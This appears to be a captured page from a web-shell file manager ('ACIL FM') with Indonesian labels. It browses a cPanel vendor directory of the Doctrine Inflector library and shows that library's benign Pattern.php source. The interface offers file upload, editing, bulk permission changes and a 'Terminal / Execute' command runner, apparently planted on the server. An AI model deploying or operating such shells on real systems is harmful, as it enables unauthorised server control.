ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/doctrine/inflector/src/Rules
/
opt
cpanel
ea-wappspector
vendor
doctrine
inflector
src
Rules
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
English
-
chmod
Open
Rename
Delete
Esperanto
-
chmod
Open
Rename
Delete
French
-
chmod
Open
Rename
Delete
Italian
-
chmod
Open
Rename
Delete
NorwegianBokmal
-
chmod
Open
Rename
Delete
Portuguese
-
chmod
Open
Rename
Delete
Spanish
-
chmod
Open
Rename
Delete
Turkish
-
chmod
Open
Rename
Delete
Pattern.php
788 B
chmod
View
DL
Edit
Rename
Delete
Patterns.php
602 B
chmod
View
DL
Edit
Rename
Delete
Ruleset.php
777 B
chmod
View
DL
Edit
Rename
Delete
Substitution.php
451 B
chmod
View
DL
Edit
Rename
Delete
Substitutions.php
1.34 MB
chmod
View
DL
Edit
Rename
Delete
Transformation.php
790 B
chmod
View
DL
Edit
Rename
Delete
Transformations.php
648 B
chmod
View
DL
Edit
Rename
Delete
Word.php
294 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/doctrine/inflector/src/Rules/Pattern.php
<?php declare(strict_types=1); namespace Doctrine\Inflector\Rules; use function preg_match; final class Pattern { /** @var string */ private $pattern; /** @var string */ private $regex; public function __construct(string $pattern) { $this->pattern = $pattern; if (isset($this->pattern[0]) && $this->pattern[0] === '/') { $this->regex = $this->pattern; } else { $this->regex = '/' . $this->pattern . '/i'; } } public function getPattern(): string { return $this->pattern; } public function getRegex(): string { return $this->regex; } public function matches(string $word): bool { return preg_match($this->getRegex(), $word) === 1; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply